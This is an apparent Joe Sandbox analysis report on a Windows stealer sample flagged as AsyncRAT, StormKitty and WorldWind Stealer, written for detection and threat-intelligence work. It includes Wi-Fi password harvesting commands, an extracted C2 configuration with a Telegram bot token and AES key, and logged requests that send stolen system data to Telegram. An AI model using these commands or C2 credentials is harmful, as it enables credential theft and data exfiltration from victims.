Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vYz1Z2heor.exe

Overview

General Information

Sample name:vYz1Z2heor.exe
renamed because original name is a hash value
Original sample name:7f1630df6b57af024a3b561bdadc208f.exe
Analysis ID:1495519
MD5:7f1630df6b57af024a3b561bdadc208f
SHA1:9b304cb2eff05f040b76eccc00ee55b914cf1839
SHA256:c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7
Tags:exe
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious desktop.ini Action
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • vYz1Z2heor.exe (PID: 8020 cmdline: "C:\Users\user\Desktop\vYz1Z2heor.exe" MD5: 7F1630DF6B57AF024A3B561BDADC208F)
    • cmd.exe (PID: 7288 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7432 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7484 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 7504 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7620 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7772 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 7820 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
vYz1Z2heor.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    vYz1Z2heor.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      vYz1Z2heor.exeJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
        vYz1Z2heor.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          vYz1Z2heor.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 6 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                    • 0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                    Click to see the 12 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.vYz1Z2heor.exe.c0000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      0.0.vYz1Z2heor.exe.c0000.0.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                        0.0.vYz1Z2heor.exe.c0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          0.0.vYz1Z2heor.exe.c0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.vYz1Z2heor.exe.c0000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                              Click to see the 5 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Suspicious desktop.ini Action
                              Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\Desktop\vYz1Z2heor.exe, ProcessId: 8020, TargetFilename: C:\Users\user\AppData\Local\9ae61374a5aaec639fcd48d5c3e802ca\user@506013_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                              Stealing of Sensitive Information

                              barindex
                              Sigma detected: Capture Wi-Fi password
                              Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\vYz1Z2heor.exe", ParentImage: C:\Users\user\Desktop\vYz1Z2heor.exe, ParentProcessId: 8020, ParentProcessName: vYz1Z2heor.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 7288, ProcessName: cmd.exe

                              Suricata Signatures

                              Timestamp:2024-08-20T11:06:31.130632+0200
                              SID:2044766
                              Severity:1
                              Source Port:49703
                              Destination Port:443
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:2024-08-20T11:06:32.063374+0200
                              SID:2803305
                              Severity:3
                              Source Port:49704
                              Destination Port:443
                              Protocol:TCP
                              Classtype:Unknown Traffic

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Found malware configuration
                              Source: vYz1Z2heor.exeMalware Configuration Extractor: AsyncRAT {"Server": "127.0.0.1", "Ports": "6606,7707,8808", "Telegram C2": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469", "Version": "", "AES_key": "VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z", "Mutex": "AsyncMutex_6SI8OkPnk", "Certificate": "MIIE9jCCAt6gAwIBAgIQAKQXqY8ZdB/modqi69mWGTANBgkqhkiG9w0BAQ0FADAcMRowGAYDVQQDDBFXb3JsZFdpbmQgU3RlYWxlcjAgFw0yMTA3MTMwNDUxMDZaGA85OTk5MTIzMTIzNTk1OVowHDEaMBgGA1UEAwwRV29ybGRXaW5kIFN0ZWFsZXIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCnRXYoxuLqqgXdcvIAYWb9DuVRl5ZpdpPfoIgmb7Y9A9AuiddKNm4is8EvIlEh98bQD4OBaK0EGWuj7WuAcQPCCGuzHpDqFZbXR7iRqVn6TiLRsO0LCMB4ta4XLQ4JdTFXvnQHcGiUxHddH70T/2P2bBVY0W+PVJDzG3XUWHpYb4PVv7qaQr/DalR3qyyd5otzE1kIjJLCOCyI/9ntIcD/PbMTKVnCP4fzbnkNB+xy0PmQmx3WRWEF5q72TdgaKrCbOpR2C/+rfGIoPC6Ze6dqWO3bQLGt6jpCO8A4CtAaAYmiw1vHUOfP54BgI9ls1TjYO3Rn4R1jmhWBGV2pT5chrglgSxMzPhrxFTQljG78RlPCJmyagJbtnPL3AlV34sQggcbf+80FVeyechm/xrMTSWXrJQ+xek1HRJBDFoCJyUR7SuIUelOW24TU+rwl/2dcALLZXpjYu3/zvJjH4iaJXRCt7oWhfzIFG1bHBFr78kV9VP0H+ZNVb129eUr14F/uubAoIPAz2EHG/CXBZv9GkFuzw0NgsI1eP7AznCLdT+z91M+yB7vWtvclwQ5k6MxWDPOraG5JMjUHvKI6zvyZ4IQ2a7bUENDghxLAqIxgo7zfZMdrjbRxBlqW14oki6Um7GpGKEZ0s2Ip6K2yJHBLpbVxOYjyzrxohMguh+qvgQIDAQABozIwMDAdBgNVHQ4EFgQUmTejTtK6on20N0YJez5sAZdMe/kwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAhauA0si7sHBd06DSGJgP5vJxL2daW30wR5XbAJd0HWj3QWfl7w27iyZ5AqBT4B0ojLNuMUG8mUOvpcoq0m80qUX7TIKUULKvb+i7uGGEDxk3W5F3es/CTUUWO0QlseWx9QEYziGlp6f3tkP4PTGSL0DywVRSa8l6f/B5kqwnW17CbQfJZ8vmy5snpDO/avgYssUnQtKQPhos7GbokNHps/bxEIRfLeprzQox20dw4RV59LcorjP5QV7Vc6FuYmhzC0nfRetTHckyxg66O3ekfTVs87MLiDV0ipQ+D/6k3g6DRuTdd4V2khjtI56ujSqTQ2PueNQXPu8y2fdsT2Rd1LcfxMS1xKAhSwhHfyy0I3JwzPG1D+sm3QNJEOoJviSNn5fYOFpY+mSEkFNMMeEbwOFdHxWbkiJk/Z8VwdH5I52tkHU3sRQMuZHtcKUc/SIt5Ivv6gtuEZQdm1GE6KUdiRB95s8JVGNlCcHX5bXbScu4eKCRQn3Cl+m5KR4EzI6hVP/iDRhVKj7Dn/blOHLzhNS5vW4X085dTP+1TBL8CHpQpiA3t8LfqfV1b/+WahOd3jNBNTXXfe/AQSjErgctLMdmOBpUQaJLOlcDcKGxWQdOo102nxg8Y/kFDARccywugoQxuIZpMYq74tjnJlJZ9kqR/LPrjmvx4v+0XFsaCPE=", "ServerSignature": "J7XpD4w+JaFzTixc0nCmiRA4ZP4bPCIpEYYGofNxvC1+0OsFQr56oTWwQMosnOTB64TZRGSdXVHKzjVchQf7X5Uwu/KQU61NPArjxWVScwKZXOGS4ZNzsWbrxgztkmlyRlQgvEq4rdFsqy1bfvHEoQ/s9aDXBNoLPPjJOexTRQSGuZYMpGSUD+ZUiVwPqqFWTb8KcjEMyABMeXGKfia2e9u8ePKpWv4HSiOfl6N47tTtIfN2FW/2mCX7BOnIZwCl3UxaQnITN812tHD1enX9TK86R91F02c0wabnf4oC07S3cqiXYo1yZ5y3dDnnERLagBuX1bemwzX/7DjHkfOaIPLgAAO8vGHbQX3pPqmwC88sG1+FExp3FEKMITnQTqQr5uXa5GjggFUSFr9rt2nfcjEjHRnOzX1jpsUUtuDyqoAFhdosdv46x+o5Iod34II88nouxzyzAfMSa48ozukJ3fCknI6u9fj/it1dx0GimhXUv4YG4A19n3EdvJbaxZXImHZvqiYGsHTIUtxa89QhxCpuJPKdTP7ya5rJFkDT0Z8ijH4Z1Dv42umyEN6PT99JRuJHcXSqkXfOeOilnM6YRY019FHq6udNVWn5OQetK4ULVcQmwPTV26ZRPyrqO57Rjr5LeSauZtNKTE/kmS1iR3eMtq5PsAHunrHZPzzaUhY=", "Group": "Default"}
                              Source: vYz1Z2heor.exe.8020.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage"}
                              Multi AV Scanner detection for submitted file
                              Source: vYz1Z2heor.exeVirustotal: Detection: 71%Perma Link
                              Source: vYz1Z2heor.exeReversingLabs: Detection: 86%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for sample
                              Source: vYz1Z2heor.exeJoe Sandbox ML: detected
                              Source: vYz1Z2heor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.10:49702 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49703 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49709 version: TLS 1.2
                              Source: vYz1Z2heor.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                              Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.10:49703 -> 149.154.167.220:443
                              Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.10:49703 -> 149.154.167.220:443
                              Connects to a pastebin service (likely for C&C)
                              Source: unknownDNS query: name: pastebin.com
                              Source: unknownDNS query: name: pastebin.com
                              Uses the Telegram API (likely for C&C communication)
                              Source: unknownDNS query: name: api.telegram.org
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: vYz1Z2heor.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
                              Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                              Source: global trafficHTTP traffic detected: POST /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="e35d3d9c-f92c-4c5d-add6-08cfbcb74510"Host: api.telegram.orgContent-Length: 119649Expect: 100-continue
                              Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="e245ce92-0133-448a-9d84-72d663372986"Host: api.telegram.orgContent-Length: 119649Expect: 100-continue
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                              Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                              Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
                              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: icanhazip.com
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49704 -> 149.154.167.220:443
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
                              Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: 157.184.7.0.in-addr.arpa
                              Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                              Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: global trafficDNS traffic detected: DNS query: pastebin.com
                              Source: unknownHTTP traffic detected: POST /bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="e35d3d9c-f92c-4c5d-add6-08cfbcb74510"Host: api.telegram.orgContent-Length: 119649Expect: 100-continue
